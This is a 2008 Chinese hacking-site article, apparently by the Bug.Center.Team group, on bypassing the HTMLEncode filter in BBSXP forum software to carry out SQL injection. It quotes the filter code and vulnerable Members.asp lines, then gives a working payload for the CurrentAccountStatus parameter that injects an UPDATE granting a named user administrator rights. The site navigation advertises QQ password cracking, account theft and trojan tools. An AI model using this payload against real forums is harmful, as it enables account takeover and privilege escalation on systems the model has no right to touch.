首 页论 坛破解QQ密码领免费QQ秀QQ等级修改盗取QQ教程QQ密码暴力破解QQ空间完整做法免费开所有QQ业务
设为首页
加入收藏
联系我们
 软件: QQ软件   综合软件   安全工具   扫站工具   扫机工具   远程监控   木马生成   免杀工具   破解补丁   攻击代理
 文章: QQ文章   综合文章   安全文章   新闻动态   实用技巧   入侵检测   木马病毒   电脑常识   编程设计   网络技术
 教程: QQ教程   综合教程   安全教程   入侵教程   免杀教程   编程教程   脱壳破解   图像处理   网吧技术   木马教程
您当前的位置:下载者 -> 入侵检测 -> 文章内容
栏目导航
· QQ文章 · 综合文章
· 安全文章 · 新闻动态
· 实用技巧 · 入侵检测
· 木马病毒 · 电脑常识
· 编程设计 · 网络技术
相关文章

BBSXP2008存在后台注射漏洞
QQ的噩梦?当即时通讯软件开..
Dvbbs8.0 access后台拿websh..
几个拿动网Dvbbs数据库的代码..
DVBBS 7.1.0 SP1博客远程注入..
韩国BBS系统GNUBoard上传漏洞..
Dvbbs 7.1Sql版跳过死循环提..
如何寻找动网Dvbbs插件的注入..
dvbbs8拿webshell的方法略记..
Dvbbs8严重漏洞
黑客入门之Php+Mysql注射语句..
SQL注入渗透BBSXP官方网站的..
BBSXP7mssql版 从注入到拿WE..
BBSXP 2007注入末日 首发ODA..
BBSXP2007,很多注入
bbsxp 2007斑竹权限注射
bbsxp 2007 注射漏洞
BBSxp 2007 注射漏洞
从注入到拿WEBSHELL(BBSXP7 ..
利用最基本的SQL注入渗透BBS..
BBSXP绕过过滤继续注入
发布时间:2008-2-27 12:44:30

官方最新过滤函数HTMLEncode,这次过滤了字符* ,再一次绕过过滤注射

Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '“&”
fString=Replace(fString,CHR(32)," ") '“ ”
fString=Replace(fString,CHR(34),""") '“"”
fString=Replace(fString,CHR(39),"'") '“'”
fString=Replace(fString,CHR(42),"*") '“*”
fString=Replace(fString,CHR(44),",") '“,”
fString=Replace(fString,CHR(45)&CHR(45),"--") '“--”
fString=Replace(fString,CHR(60),"&#60;") '“<”
fString=Replace(fString,CHR(62),"&#62;") '“>”
fString=Replace(fString,CHR(92),"\") '“\”
fString=Replace(fString,CHR(59),"&#59;") '“;”
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*)&#59;","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp漏洞文件作为测试:
SearchType=HTMLEncode(Request("SearchType")) //第8行
  SearchText=HTMLEncode(Request("SearchText"))
  SearchRole=RequestInt("SearchRole")
  CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))
......
if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //第18行
......
if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //第22行

  if item<>"" then item=" where "&mid(item,5)
......
TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) '获取数据数量
//第54行
 

 

看个sql语句:

select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)

 

变量userid绕过过滤成功执行了update
同理构造:

SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=0x79006C003600330036003400)


关于Bug.Center.Team:

     Bug.Center.Team(又名:漏洞预警中心小组)是国内较早成立的以脚本安全为主要方向的网络安全组 织,致力于网络和脚本安全问题的研究,在对于脚本程序的修补、维护、漏洞检测都有专业水平,是国 内最专业、最经验的安全服务组织,有关Bug.Center.Team的详情请参见: http://www.cnbct.org
[] [打 印] [收 藏]
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 联系站长
如果您对本站有任何建议或意见,请联系站长,感谢您对本站一如既往的支持!
Powered by:NewAsp SiteManageSystem Version 2.1 SP1 1030